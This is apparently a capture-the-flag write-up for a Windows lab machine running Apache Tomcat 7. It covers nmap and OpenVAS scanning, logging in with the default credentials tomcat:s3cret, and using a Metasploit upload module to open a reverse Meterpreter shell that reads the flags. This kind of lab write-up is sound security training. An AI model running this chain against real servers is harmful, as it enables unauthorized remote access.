2 March 2021

Starting information

  • Machine IP :
  • System : Windows

Network enumeration

I start by modifying my /etc/hosts file to avoid writing the IP everytime :

/etc/hosts jerry

Then I look for open ports with nmap and start an OpenVAS scan:

nmap -p- jerry -Pn
Not shown: 65534 filtered ports
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 107.14 seconds

There is only one open port: 8080. Now I can start nmap scripts on the open port to gather more information:

nmap -p8080 -A -Pn jerry

8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Web page

Accessing shows us a default Apache Tomcat webpage. Three buttons are of interests:

  • Server Status
  • Manager App
  • Host Manager

When clicking these buttons, a basic http authentication is requested. If it fails, a page with a default message is displayed:

For example, to add the admin-gui role to a user named tomcat with a password of s3cret, add the following to the config file listed above.

Could the administrator have used these default credentials to configure its application ? Yes, the credentials are tomcat:s3cret.

Server status

The server status page gives us a bunch of information about the server:

Tomcat VersionJVM VersionJVM VendorOS NameOS VersionOS ArchitectureHostnameIP Address
Apache Tomcat/7.0.881.8.0_171-b11Oracle CorporationWindows Server 2012 R26.3amd64JERRY10.10.10.95

Web application manager

The application manager page gives us commands to start and stop services and deploy files.

Information gathered

After scanning the ports with nmap and OpenVAS and looking at the application here is the information gathered.

Operating System


Open ports

8080/tcpApache Tomcat/7.0.88


Here are the vulnerabilities found by OpenVAS:

ApacheHTTP Brute Force Logins With Default Credentials ReportingHigh
ApacheApache Tomcat Manager Remote Unauthorized Access VulnerabilityHigh

These two vulnerabilities report that the server uses default credentials admin:admin and tomcat:s3cret, one of which was already found.


The default credentials found can be used to exploit a vulnerability with metasploit. After searching for tomcat in metasploit I selected the exploit multi/http/tomcat_mgr_upload and configured it with the following parameters:

LHOSTmy ip

In the metasploit console, execute use <exploit_path> to select an exploit, and set <option_name> to configure an option.

Once everything is setup, I run exploit and get a shell:

meterpreter > getuid
Server username: JERRY$

meterpreter > sysinfo
Computer    : JERRY
OS          : Windows Server 2012 R2 6.3 (amd64)
Meterpreter : java/windows

From there, the flags are already accessible:

cat ../Users/Administrator/Desktop/flags/2\ for\ the\ price\ of\ 1.txt